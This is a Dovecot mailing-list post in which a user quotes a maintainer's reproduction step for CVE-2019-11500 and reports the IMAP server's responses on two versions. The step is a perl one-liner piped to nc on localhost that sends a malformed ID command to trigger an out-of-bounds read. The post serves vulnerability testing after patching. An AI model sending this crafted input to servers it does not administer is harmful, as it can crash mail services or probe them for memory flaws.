CVE-2019-11500: Critical vulnerability in Dovecot and Pigeonhole

KSB listeem at ksb.id.lv
Wed Sep 4 01:22:56 EEST 2019


On 2019.09.03. 22:32, KSB via dovecot wrote:
> On 2019.08.28. 15:10, Aki Tuomi via dovecot wrote:
>>
>> Steps to reproduce:
>>
>> This bug is best observed using valgrind to see the out of bounds read
>> with following snippet:
>>
>> perl -e 'print "a id (\"foo\" \"".("x"x1021)."\\A\" \"bar\"
>> \"\000".("x"x1020)."\\A\")\n"' | nc localhost 143
>>
>>
> 
> Hi!
> Before I had 2.2.25 and returned result was:
> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE 
> IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
> a BAD Missing ')'
> 
> now I upgraded to 2.2.36.4 and the result is the same.
> 
> -- 
> KSB

Btw, got 1 time:
perl -e 'print "a id (\"foo\" \"".("x"x1021)."\\A\" \"bar\"
\"\000".("x"x1020)."\\A\")\n"' | nc localhost 143
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE 
IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
a BAD Missing ')'
* BYE Input buffer full, aborting

with 2.2.36.4

--
KSB


More information about the dovecot mailing list